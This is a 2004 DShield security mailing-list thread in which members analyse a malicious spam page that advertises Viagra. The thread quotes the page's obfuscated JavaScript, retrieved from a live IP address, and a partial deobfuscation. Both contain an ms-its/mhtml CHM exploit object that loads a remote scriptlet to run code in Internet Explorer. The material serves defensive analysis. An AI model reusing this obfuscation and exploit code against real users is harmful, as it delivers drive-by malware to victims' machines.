[Dshield] FW: Osama Bin Laden Captured

Bjorn Stromberg bjorn at thechemistrylab.com
Fri Apr 23 16:06:31 GMT 2004


This page displays an ad for drugs and then uses the CHM vulnerability
to do something nasty; still investigating.

Here's the deobfuscated HTML (as recovered so far):

<HTML><HEAD><TITLE>where to buy viagra</TITLE>
<META http-equiv=cONTENT-TYPE content="TEXT/HTML; cHARSET=ISO-8859-1">

<META content="Buy Viagra online with huge discounts. No prescription
needed." name=DEScRIPTION>
<META content="buy viagra" name=KEYWORDS>
<META http-equiv=PRAGMA content:DNO-cAcHE>
<META content=NOARcHIVE name=ROBOTS>

<META content="MSHTML 6.00.2600.0" name=GENERATOR><!/HEAD>
<BODY>
<FONT face=Arial color=#000080 size=3><B>Welcome to Global-Viagra.com
</B></FONT>
<BR><FONT face=Arial color=#000080 size=3><B>IF YOU SUFFER FROM
</B></FONT><FONT
face=Arial color=#000080 size=2><BR><BR>Limited performance ?
<BR><BR>Inability
to sustain erection ? <BR><BR>If you answer "yes" to these questions, then
click
on any of the links below <BR><BR%3!E%3">Order page</A> <BR><A
href="prescription.html">Prescription</A> <BR><A
href="testimonial.html">Men with sexual inability speak
out</A> <BR><A href="supply.html">Supply of
pharmaceutical impotence drug</A> <BR><A
href="consult.html">Online medical consultation</A>
</FONT><BR><BR>

<textarea id="code" style="display:none;">
    <object data="ms-its:mhtml:file://c:\foo.mht!http://---insert bad place
here---//pics.chm::/pics.htm" type="text/x-scriptlet"></object>

Bjorn Stromberg
::this is not a sig::

----- Original Message ----- 
From: "Kevin M. Shortt" <shortt at cgicafe.com>
To: "General DShield Discussion List" <list at lists.dshield.org>
Sent: Friday, April 23, 2004 8:53 AM
Subject: Re: [Dshield] FW: Osama Bin Laden Captured


>
>
> I just used "wget http://220.95.231.54/pics/"
> to view what was there.
> This is what was retrieved.
>
> -k
>
>
>
> <!--
> function S(){var s=location.href.substr(7);return
> s.substr(0,s.indexOf('/'));}
> function T(){return 'l';}
> function U(){return 'C';}
> function V(){return 'm';}
> function W(){return '.';}
> function X(){return 'E';}
> function Y(){return 'i';}
> function Z(){return 'x';}
>
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+"%
3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X
()+"%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20http-equ"+Y()+"v%3D"+U()+"ONT"+X()+
"NT-TYP"+X()+"%20content%3D%22T"+X()+"XT/HTML%3B%20"+U()+"HARS"+X()+"T%3DISO
-8859-1%22%3"+X()+"%0D%0A%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22Buy%20V"+Y
()+"agra%20on"+T()+""+Y()+"ne%20w"+Y()+"th%20huge%20d"+Y()+"scounts"+W()+"%2
0No%20prescr"+Y()+"pt"+Y()+"on%20needed"+W()+"%22%20na"+V()+"e%3DD"+X()+"S"+
U()+"RIPTION%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22buy%20v"+Y()+"
agra%22%20na"+V()+"e%3DK"+X()+"YWORDS%3"+X()+"%0D%0A%3"+U()+"M"+X()+"TA%20ht
tp-equ"+Y()+"v%3DPRAGMA%20content%3aDNO-"+U()+"A"+U()+"H"+X()+"%3"+X()+"%0D%
0A%3"+U()+"M"+X()+"TA%20content%3DNOAR"+U()+"HIV"+X()+"%20na"+V()+"e%3DROBOT
S%3"+X()+"%0D%0A%0D%0A%3"+U()+"M"+X()+"TA%20content%3D%22MSHTML%206"+W()+"00
"+W()+"2600"+W()+"0%22%20na"+V()+"e%3DG"+X()+"N"+X()+"RATOR%3"+X()+"%3"+U()+
"!
>
/H"+X()+"AD%3"+X()+"%0D%0A%3"+U()+"BODY%3"+X()+"%0D%0A%3"+U()+"FONT%20face%3
DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000080%20s"+Y()+"ze%3D3%3"+X()+"%3"+U(
)+"B%3"+X()+"We"+T()+"co"+V()+"e%20to%20G"+T()+"oba"+T()+"-V"+Y()+"agra"+W()
+"co"+V()+"%20%0D%0A%3"+U()+"/B%3"+X()+"%3"+U()+"/FONT%3"+X()+"%0D%0A%3"+U()
+"BR%3"+X()+"%3"+U()+"FONT%20face%3DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000
080%20s"+Y()+"ze%3D3%3"+X()+"%3"+U()+"B%3"+X()+"IF%20YOU%20SUFF"+X()+"R%20FR
OM%20%3"+U()+"/B%3"+X()+"%3"+U()+"/FONT%3"+X()+"%3"+U()+"FONT%20%0D%0Aface%3
DAr"+Y()+"a"+T()+"%20co"+T()+"or%3D%23000080%20s"+Y()+"ze%3D2%3"+X()+"%3"+U(
)+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"L"+Y()+""+V()+""+Y()+"ted%20perfor"+V()+"a
nce%20%3F%20%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"Inab"+Y()+""+T()+""+Y()+
"ty%20%0D%0Ato%20susta"+Y()+"n%20erect"+Y()+"on%20%3F%20%3"+U()+"BR%3"+X()+"
%3"+U()+"BR%3"+X()+"If%20you%20answer%20%22yes%22%20to%20these%20quest"+Y()+
"ons%2"+U()+"%20then%20c"+T()+""+Y()+"ck%20%0D%0Aon%20any%20of%20the%20"+T()
!
>  +""+Y()+"nks%20be"+T()+"ow%20%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3!
> "+X()+"%3
> )+"%22%3"+X()+"Order%20page%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%3"+
U()+"A%20%0D%0Ahref%3D%22prescr"+Y()+"pt"+Y()+"on"+W()+"ht"+V()+""+T()+"%22%
3"+X()+"Prescr"+Y()+"pt"+Y()+"on%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%
3"+U()+"A%20%0D%0Ahref%3D%22test"+Y()+""+V()+"on"+Y()+"a"+T()+""+W()+"ht"+V(
)+""+T()+"%22%3"+X()+"Men%20w"+Y()+"th%20se"+Z()+"ua"+T()+"%20"+Y()+"nab"+Y(
)+""+T()+""+Y()+"ty%20speak%20%0D%0Aout%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"
+X()+"%3"+U()+"A%20href%3D%22supp"+T()+"y"+W()+"ht"+V()+""+T()+"%22%3"+X()+"
Supp"+T()+"y%20of%20%0D%0Aphar"+V()+"aceut"+Y()+"ca"+T()+"%20"+Y()+""+V()+"p
otence%20drug%3"+U()+"/A%3"+X()+"%20%3"+U()+"BR%3"+X()+"%3"+U()+"A%20%0D%0Ah
ref%3D%22consu"+T()+"t"+W()+"ht"+V()+""+T()+"%22%3"+X()+"On"+T()+""+Y()+"ne%
20"+V()+"ed"+Y()+"ca"+T()+"%20consu"+T()+"tat"+Y()+"on%3"+U()+"/A%3"+X()+"%2
0%0D%0A%3"+U()+"/FONT%3"+X()+"%3"+U()+"BR%3"+X()+"%3"+U()+"BR%3"+X()+"%0D%0A
%0D%0A%3"+U()+"te"+Z()+"tarea%20"+Y()+"d%3D%22code%22%20sty"+T()+"e%3D%22d"+
Y()!
>
+"sp"+T()+"ay%3Anone%3B%22%3"+X()+"%0D%0A%20%20%20%20%3"+U()+"object%20data%
3D%22%26%23109%3Bs-"+Y()+"ts%3A"+V()+"ht"+V()+""+T()+"%3Af"+Y()+""+T()+"e%3A
//"+U()+"%3A%5"+U()+"foo"+W()+""+V()+"ht%21http%3A//"+S()+"//p"+Y()+"cs"+W()
+"ch"+V()+"%3A%3A/p"+Y()+"cs"+W()+"ht"+V()+"%22%20type%3D%22te"+Z()+"t/"+Z()
+"-scr"+Y()+"pt"+T()+"et%22%3"+X()+"%3"+U()+"/object%3"+X()+"%0D%0A%3"+U()+"
/te"+Z()+"tarea%3"+X()+"%0D%0A%3"+U()+"object%20data%3D%22"+V()+"s-"+Y()+"ts
%3A"+V()+"ht"+V()+""+T()+"%3Af"+Y()+""+T()+"e%3A//"+U()+"%3A%5"+U()+"foo"+W(
)+""+V()+"ht%21http%3A//"+S()+"//p"+Y()+"cs"+W()+"ch"+V()+"%3A%3A/p"+Y()+"cs
"+W()+"ht"+V()+"%22%20type%3D%22te"+Z()+"t/"+Z()+"-scr"+Y()+"pt"+T()+"et%22%
3"+X()+"%3"+U()+"/object%3"+X()+""));
> //-->
>
>
> _______________________________________________
> list mailing list
> list at lists.dshield.org
> To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list



